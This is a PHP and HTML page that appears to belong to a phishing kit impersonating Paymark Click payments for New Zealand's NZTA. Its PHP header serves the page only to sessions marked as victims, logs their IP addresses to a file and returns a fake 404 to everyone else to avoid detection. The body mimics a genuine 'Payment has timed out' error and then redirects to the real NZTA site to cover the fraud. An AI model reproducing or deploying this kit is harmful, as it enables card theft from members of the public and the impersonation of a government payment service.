<?php
session_start();
if (isset($_SESSION['access']) && $_SESSION['access'] === true && isset($_SESSION['is_user']) && $_SESSION['is_user'] === true) {
    $_SESSION['done'] = true;
    $ip = getenv("REMOTE_ADDR");
    $file = fopen('done.txt', 'a');
    if ($file === false) {
        echo "opening failed";
        exit;
    }

    if (fwrite($file,$ip."\n")){
        echo 'ok';
    }
}
else{
    header("HTTP/1.0 404 Not Found");
    die();
}
?>
<!DOCTYPE html>
<!--[if IE 8 ]> <html class="ie8 ie"> <![endif]-->
<!--[if IE 9 ]> <html class="ie9 ie"> <![endif]-->
<!--[if (gt IE 9)|!(IE)]>
<html lang="en" class="ie">
<![endif]-->
<head><meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name="robots" content="noindex, nofollow" /><title>
    Paymark Web Payments
</title><link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css" />
    <link rel="stylesheet" type="text/css" href="assets/css/https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
    <link rel="stylesheet" type="text/css" href="assets/css/base.css?v6" />
    <link rel="stylesheet" type="text/css" href="assets/css/base-ie.css" />
    <link id="link_merchant_style" rel="stylesheet" type="text/css" />

    <script type="text/javascript" src="assets/js/jquery-3.2.1.min.js"></script>
    <script type="text/javascript" src="assets/js/progressbar.min.js"></script>
    <script type="text/javascript" src='assets/js/bootstrap.min.js'></script>
    <script type="text/javascript" src="assets/js/jquery.inputmask.bundle.js"></script>
    <script type="text/javascript" src="assets/js/jquery.validate.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.validate.additional-methods.min.js"></script>
</head>
<body id="body">

<header id="container_header" class="header">
    <div>
        <img src="assets/img/paymark-logo.png" id="ctl00_img_header_logo" alt="Paymark Click" />
    </div>
</header>

<div id="container_main">



    <div class="inner center-vh">
        <div class="feedback">
            <img src="assets/img/error-icon.svg" onerror="this.src='assets/img/error-icon.png'" width="80" height="80" alt="error" class="center-block">
            <h2 class="title text-center">Payment has timed out</h2>
            <hr>

            <div class="feedback-content">
                <h4>An error has occurred while processing your request. The reason might be one of the following:</h4>

                <dl>
                    <dt>1. You clicked the back button</dt>
                    <dd>If the error message is displayed after you entered the payment details, then pressed Submit, and then clicked the back button on your browser, then the transaction has processed.</dd>
                    <p><strong>Recommendation:</strong>To confirm the status of this transaction, please contact the merchant.</p>

                    <br />

                    <dt>2. You clicked the back button while performing 3DS Authentication (card payments only)</dt>
                    <dd>If the error message is displayed after you were redirected to a 3DS Authentication page, and then clicked the back button on your browser, then the transaction has failed.</dd>
                    <p><strong>Recommendation:</strong>Please try your payment again or contact the merchant.</p>

                    <br />

                    <dt>3. You took too long to enter payment details</dt>
                    <dd>If the error message page is displayed after you entered payment details and pressed Submit, the transaction has not been processed. For security reasons, you only have a limited amount of time (20 minutes) to complete the form and press Submit.</dd>
                    <p><strong>Recommendation:</strong>Please return to the merchant site and restart the process.</p>

                    <br />

                    <dt>Otherwise...</dt>
                    <dd>If the error message page is displayed and you have not entered payment details, you may not have cookies enabled in your browser. The Paymark Click pages require that you enable cookies in your browser.</dd>
                    <p><strong>Recommendation:</strong>To enable cookies please refer to your browser's Help, then return to the merchant site and restart the process.</p>
                </dl>
            </div>

            <hr>
        </div>

        <div class="text-center">
            <a href="https://payment.nzta.govt.nz/sessionexpired" id="ctl00_ContentPlaceHolder1_try_again" class="btn btn-primary text-uppercase">Try again</a>
        </div>
    </div>



</div>

<footer class="footer">
    <div class="text-center">
        <img src='assets/img/click-logo@2x.png' />
    </div>
</footer>
<script type="text/javascript">
    setTimeout(function(){
        window.location.replace("https://payment.nzta.govt.nz/sessionexpired");
    }, 5000);
</script>
</body>
</html>
